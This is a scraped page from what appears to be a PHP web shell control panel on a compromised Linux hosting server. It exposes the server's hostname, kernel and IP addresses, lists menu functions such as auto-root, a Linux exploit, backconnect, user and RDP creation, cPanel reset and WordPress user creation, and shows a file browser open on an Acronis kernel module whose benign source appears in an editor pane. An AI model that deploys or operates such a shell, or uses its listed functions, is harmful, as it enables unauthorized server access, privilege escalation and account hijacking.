Linux eyewebsolution.dnshostserver.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
: 185.131.55.234 | : 216.73.216.36
674 Domain
5.6.40
omxrelocation
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
file_protector-1.1-1524 /
[ HOME SHELL ]
Name
Size
Permission
Action
common
[ DIR ]
drwxr-xr-x
syscall_hooks
[ DIR ]
drwxr-xr-x
transport
[ DIR ]
drwxr-xr-x
Kbuild
3.71
KB
-rw-r--r--
Makefile
2.2
KB
-rw-r--r--
compat.c
5.74
KB
-rw-r--r--
compat.h
6.94
KB
-rw-r--r--
debug.h
3.56
KB
-rw-r--r--
dkms.conf
146
B
-rw-r--r--
memory.h
529
B
-rw-r--r--
module.c
1.86
KB
-rw-r--r--
module_ref.h
421
B
-rw-r--r--
module_rundown_protection.c
3.6
KB
-rw-r--r--
module_rundown_protection.h
743
B
-rw-r--r--
rundown_protection.c
4.2
KB
-rw-r--r--
rundown_protection.h
2.83
KB
-rw-r--r--
stringify.h
261
B
-rw-r--r--
task_info_map.c
19.07
KB
-rw-r--r--
task_info_map.h
1.92
KB
-rw-r--r--
tracepoints.c
3.02
KB
-rw-r--r--
tracepoints.h
299
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : module.c
/** @file @brief Linux kernel 'module' @details Copyright (c) 2017 Acronis International GmbH @author Mikhail Krivtsov (mikhail.krivtsov@acronis.com) @since $Id: $ */ #include "debug.h" // DPRINTF #include "module_rundown_protection.h" #include "syscall_common.h" #include "task_info_map.h" #include "tracepoints.h" #include "transport.h" #include <linux/module.h> #include <linux/version.h> // LINUX_VERSION_CODE, KERNEL_VERSION() #ifdef __DEBUG_LEVEL__ #ifdef DEFAULT_LOGGER_DEBUG_LEVEL unsigned int logger_debug_level = DEFAULT_LOGGER_DEBUG_LEVEL; #else unsigned int logger_debug_level = 0; #endif #endif /* Initialization order is very important. 'transport' depends on 'pid_bw_list' 'syscall_hooks' and 'tracepoints' depend on 'transport' */ static int __init module_init_impl(void) { int ret; IPRINTF("DRIVER_VERSION=%s", DRIVER_VERSION_STRING); IPRINTF("LINUX_VERSION_CODE=%u.%u.%u", LINUX_VERSION_CODE >> 16, (LINUX_VERSION_CODE >> 8) & 0xFF, LINUX_VERSION_CODE & 0xFF); #if defined RHEL_RELEASE_CODE IPRINTF("RHEL_RELEASE_CODE=%u.%u", RHEL_RELEASE_CODE >> 8, RHEL_RELEASE_CODE & 0xFF); #endif task_info_maps_init(); ret = syscall_hooks_init(); if (ret) { EPRINTF("'%s()' failure %i", "syscall_hooks_init", ret); goto out; } mod_rundown_protection_init(false /*not ready*/); ret = transport_mod_init(); if (ret) { EPRINTF("'%s()' failure %i", "transport_mod_init", ret); } out: DPRINTF("ret=%i", ret); return ret; } static void __exit module_down_impl(void) { IPRINTF("module unload started"); syscall_hooks_exit(); transport_mod_down(); task_info_maps_clear(); IPRINTF("module unload finished"); } MODULE_AUTHOR("Acronis International GmbH"); MODULE_DESCRIPTION("APL (Active Protection for Linux)"); MODULE_LICENSE("GPL"); MODULE_VERSION(DRIVER_VERSION_STRING); module_init(module_init_impl); module_exit(module_down_impl);
Close